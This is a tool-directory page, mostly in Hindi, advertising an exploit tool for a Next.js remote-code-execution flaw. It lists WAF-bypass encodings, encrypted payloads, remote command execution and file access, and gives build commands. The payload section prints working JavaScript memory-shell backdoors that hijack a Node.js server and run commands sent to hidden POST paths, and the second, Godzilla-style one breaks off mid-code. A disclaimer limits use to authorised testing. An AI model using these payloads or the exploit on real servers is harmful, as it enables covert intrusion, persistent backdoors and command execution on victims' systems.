Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/pyroxenites/nextjs_rce_exploit_tool
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
GitHubpyroxenites/nextjs_rce_exploit_tool

Nextjs_RCE_Exploit_Tool

CVE-2025-55182 और CVE-2025-66478 के लिए शोषण

रिपॉजिटरी देखें
14136169 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Next.js RCE Exploit Tool (CVE-2025-55182)


[!CAUTION] अस्वीकरण / Disclaimer

यह उपकरण केवल सुरक्षा अनुसंधान और शिक्षण के उद्देश्यों के लिए है। उपयोगकर्ता परीक्षण करने से पहले लक्ष्य सिस्टम से वैध प्राधिकरण प्राप्त करना सुनिश्चित करें।

अनधिकृत पैठ परीक्षण, दुर्भावनापूर्ण हमले, या किसी भी अवैध उपयोग के लिए सख्त वर्जित है। भेद्यता का पता लगाने और उसका शोषण करने से उत्पन्न सभी जोखिम और कानूनी परिणाम उपयोगकर्ता स्वयं वहन करेंगे, और ये परियोजना डेवलपर से संबंधित नहीं हैं।

यदि आप इन शर्तों को स्वीकार नहीं करते हैं, तो कृपया तुरंत इस उपकरण को डाउनलोड करना या उपयोग करना बंद करें।

यह उपकरण सार्वजनिक लेखों पर आधारित है; कोई पूर्व-संकलित बाइनरी वितरण प्रदान नहीं किया गया है। कृपया कोड का स्वयं ऑडिट करें और इसे संकलित करें।


🙏 धन्यवाद / Credits

इस उपकरण का मुख्य तर्क और बायपास दृष्टिकोण समुदाय के सुरक्षा शोधकर्ताओं से प्रेरित है। हम निम्नलिखित विशेषज्ञों को हार्दिक धन्यवाद देते हैं:

  • @maple3142
  • @lachlan2k (React2Shell)
  • @phithon (P牛)

✨ कार्य सुविधाएँ / Features

  • शोषण श्रृंखला समर्थन:
    • Prototype Chain
    • Array Map Chain
  • WAF बायपास:
    • ✅ Unicode एन्कोडिंग
    • ✅ UTF-16LE एन्कोडिंग
  • OpSec:
    • 🔐 AES पेलोड एन्क्रिप्शन
  • टूलबॉक्स:
    • कमांड निष्पादन: सिंक्रोनस (execSync) और एसिंक्रोनस (exec) मोड का समर्थन करता है।
    • फ़ाइल प्रबंधन: एक्सप्लोरर-शैली इंटरफ़ेस, फ़ाइल ब्राउज़िंग, पढ़ना, लिखना समर्थित है।
    • उन्नत शोषण: मूल JS कोड निष्पादन, मॉड्यूल लोडिंग (module._load) का समर्थन करता है।

🛠️ त्वरित आरंभ

1. भेद्यता सत्यापन (Nuclei)

Nuclei का उपयोग करके बैच फिंगरप्रिंट पहचान और भेद्यता सत्यापन:

nuclei -l urls.txt -t CVE-2025-55182.yaml -o result.txt

2. संकलन और चलाना

# निर्भरताएँ व्यवस्थित करें
go mod tidy

# संकलित करें
go build -ldflags="-s -w" -o ReactExploit cmd/main.go

# चलाएँ
./ReactExploit

📸 कार्य स्क्रीनशॉट / Screenshots

1. एन्कोडिंग

Config & WAF Bypass

2. कमांड निष्पादन (RCE)

RCE

3. फ़ाइल एक्सप्लोरर

File Explorer File Read

4. उन्नत उपयोग (मूल JS Eval)

JS Eval Module Load

💉 पेलोड उदाहरण

उन्नत शोषण -> मूल JS कोड निष्पादन मॉड्यूल में, पोस्ट-एक्सप्लॉइटेशन ऑपरेशन के लिए निम्नलिखित पेलोड का उपयोग किया जा सकता है।

1. मेमशेल इंजेक्शन

cmdlinux

(function(){
    try {
        if (global.memshell_active) return "Memshell already active!";
        var http = process.mainModule.require('http');
        var cp = process.mainModule.require('child_process');
        var qs = process.mainModule.require('querystring');
        var originalEmit = http.Server.prototype.emit;
        http.Server.prototype.emit = function(event, req, res) {
            if (event === 'request' && req && res) {
                var url = req.url || "";
                if (req.method === 'POST' && url.indexOf('/?pass') !== -1) {
                    var bodyArr = [];
                    req.on('data', function(chunk) {
                        bodyArr.push(chunk);
                    });
                    req.on('end', function() {
                        try {
                            var bodyStr = Buffer.concat(bodyArr).toString();
                            var postData = qs.parse(bodyStr);
                            var cmd = postData['pwd'];
                            if (cmd) {
                                var output = cp.execSync(cmd).toString();
                                res.writeHead(200, {'Content-Type': 'text/plain'});
                                res.end(output);
                            } else {
                                res.writeHead(400);
                                res.end("Parameter 'pwd' is missing.");
                            }
                        } catch (e) {
                            res.writeHead(500);
                            res.end("Error: " + e.message);
                        }
                    });
                    return true;
                }
            }
            return originalEmit.apply(this, arguments);
        };
        global.memshell_active = true;
        return "Memshell injected!";
    } catch (e) {
        return "Injection failed: " + e.message;
    }
})()

https://github.com/BeichenDream/GodzillaNodeJsPayload

(function() {
    try {
        if (global.godzilla_memshell_hooked) return "Memshell already hooked!";
        var http = process.mainModule.require('http');
        var secretKey = '3c6e0b8a9c15224a'; 
        var payloadName = 'ge0b8a';
        function rc4(key, data) {
            var s = Array(256), k = Array(256);
            var i, j = 0, tmp;
            for (i = 0; i < 256; i++) {
                s[i] = i;
                k[i] = key.charCodeAt(i % key.length);
            }
            for (i = 0; i < 256; i++) {
                j = (j + s[i] + k[i]) % 256;
                tmp = s[i];
                s[i] = s[j];
                s[j] = tmp;
            }
            i = j = 0;
            var out = Buffer.alloc(data.length);
            for (var idx = 0; idx < data.length; idx++) {
                i = (i + 1) % 256;
                j = (j + s[i]) % 256;
                tmp = s[i];
                s[i] = s[j];
                s[j] = tmp;
                var t = (s[i] + s[j]) % 256;
                out[idx] = data[idx] ^ s[t];
            }
            return out;
        }
        var originalEmit = http.Server.prototype.emit;
        http.Server.prototype.emit = function(event, req, res) {
            if (event === 'request' && req && res && req.method === 'POST' && (req.url || "").indexOf('/76f03711') !== -1) {
                var bodyArr = [];
                req.on('data', function(chunk) {
                    bodyArr.push(chunk);
                });
                req.on('end', async function() {
                    try {
                        var bodyStr = Buffer.concat(bodyArr).toString();
                        var json = JSON.parse(bodyStr);
टूल डाउनलोड करें